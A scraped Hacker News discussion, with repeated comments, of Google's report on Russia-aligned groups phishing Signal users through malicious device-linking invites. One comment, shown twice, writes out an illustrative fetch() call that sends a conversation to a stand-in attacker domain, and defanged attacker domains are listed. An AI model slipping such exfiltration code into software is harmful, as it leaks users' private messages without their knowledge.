I'm only surprised it took this long for an in-the-wild attack to appear in open literature.
It certainly doesn't help that signal themselves have discounted this attack (quoted from the iacr eprint paper):
"We disclosed our findings to the Signal organization on October 20, 2020, and received an answer on October 28, 2020. In summary, they state that they do not treat a compromise of long-term secrets as part of their adversarial model"
One thing I'm realizing more and more (I've been building an encrypted AI chat service which is powered by encrypted CRDTs) is that "E2E encryption" really requires the client to be built and verified by the end user. I mean end of the day you can put a one-line fetch/analytics-tracker/etc on the rendering side and everything your protocol claimed to do becomes useless. That even goes further to the OS that the rendering is done on.
The last bit adds an interesting facet, even if you manage to open source the client and manage to make it verifiably buildable by the user, you still need to distribute it on the iOS store. Anything can happen in the publish process. I use iOS as the example because its particularly tricky to load your own build of an application.
And then if you did that, you still need to do it all on the other side of the chat too, assuming its a multi party chat.
You can have every cute protocol known to man, best encryption algorithms on the wire, etc but end of the day its all trust.
I mention this because these days I worry more that using something like signal actually makes you a target for snooping under the false guise that you are in a totally secure environment. If I were a government agency with intent to snoop I'd focus my resources on Signal users, they have the most to hide.
Sometimes it all feels pointless (besides encrypted storage).
I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
It is not plainly stated in the article, but as far as I understand, the first step of one of the attacks is to take the smartphone off a dead soldier’s body.
Is this suggesting that a single QR scan can on its own perform the device linking? If so, it seems like that's kind of the hole here, right? Like you shouldn't be able to scan a code that on its own links the device; you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)
There are many voices which try to tell you that signal is compromised. Notice that all of those voices have less open-source-ness than Signal in virtually all cases.
Signal is doing its best to be a web scale company and also defend human rights. Individual dignity matters.
They provided some domains, but not all of them are taken. For example, signal-protect[.]host is available, kropyva[.]site is available, signal-confirm[.]site is registered in Ukraine. Some of them are registered in Russia.
Never trust a country at war—any side. Party A blames B, Party B blames A, but both have their own agenda.
> In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.
> Android supports alphanumeric passwords, which offer significantly more security than numeric-only PINs or patterns.
Ironic, coming from Google. As Android is THE only OS where usage of alphanumeric passwords is nearly impossible, as Android limits the length of a password to arbitrary 16 characters, preventing usage of passphrases.
Am I reading this right? You can initiate device linking in Signal by clicking on an external URL? This is so stupid, I don't even have words for this. In a security-focused app you should not be able to link anything, without manually going into the devices/link menu and clicking "link new device".
If somehow, the victims phone provider can be compromised or coerced into cooperating, the government actor can intercept the text message Signal and others use for verification and set up the victims account on a new device.
It's very easily done if the victim is located in an authoritarian county like Russia or Iran, they can simply force the local phone provider to co-operate.
tldr: they mostly use phishing with fake ukrainian army group invites to trick people (from ukrainian army) to link the phone device to a attacker-controlled PC.
Also they try to get the actual database SQL files from Windows devices and Android devices.
Russia fucking up the worlds stuff this decade will be the material for history books. The are actively breaking Europe and almost noone seems to care.
Alphabet is working in tandem with the Ukrainian SBU? Interesting choice, just as the US President has called Zelensky a dictator (and for good reason, Poroshenko, the previous Ukrainian president, has basically said the same thing a few days ago). I wonder how long the Alphabet higher-ups will allow this thing to unfold, or maybe they're not so good at reading the geopolitical tea leaves.
Multiple Russia-aligned threat actors actively targeting Signal Messenger
(cloud.google.com)817 points by karel-3d 19 February 2025 | 286 comments
Comments
I'm only surprised it took this long for an in-the-wild attack to appear in open literature.
It certainly doesn't help that signal themselves have discounted this attack (quoted from the iacr eprint paper):
The last bit adds an interesting facet, even if you manage to open source the client and manage to make it verifiably buildable by the user, you still need to distribute it on the iOS store. Anything can happen in the publish process. I use iOS as the example because its particularly tricky to load your own build of an application.
And then if you did that, you still need to do it all on the other side of the chat too, assuming its a multi party chat.
You can have every cute protocol known to man, best encryption algorithms on the wire, etc but end of the day its all trust.
I mention this because these days I worry more that using something like signal actually makes you a target for snooping under the false guise that you are in a totally secure environment. If I were a government agency with intent to snoop I'd focus my resources on Signal users, they have the most to hide.
Sometimes it all feels pointless (besides encrypted storage).
I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
(via https://news.ycombinator.com/item?id=43103692, but no comments there)
Signal is doing its best to be a web scale company and also defend human rights. Individual dignity matters.
This is not a simple conversation.
Never trust a country at war—any side. Party A blames B, Party B blames A, but both have their own agenda.
Missing from their recommendations: Install No Script: https://noscript.net/
Ironic, coming from Google. As Android is THE only OS where usage of alphanumeric passwords is nearly impossible, as Android limits the length of a password to arbitrary 16 characters, preventing usage of passphrases.
https://www.microsoft.com/en-us/security/blog/2025/02/13/sto...
Reading this for the first time, what is a “re-invasion”? Do they mean the explained cyber attack as second invasion aka “re-invasion”?
If somehow, the victims phone provider can be compromised or coerced into cooperating, the government actor can intercept the text message Signal and others use for verification and set up the victims account on a new device.
It's very easily done if the victim is located in an authoritarian county like Russia or Iran, they can simply force the local phone provider to co-operate.
Oh how Americans make fun of the CCP but watching all the tech bros bend the knee was embarrassing.
Also they try to get the actual database SQL files from Windows devices and Android devices.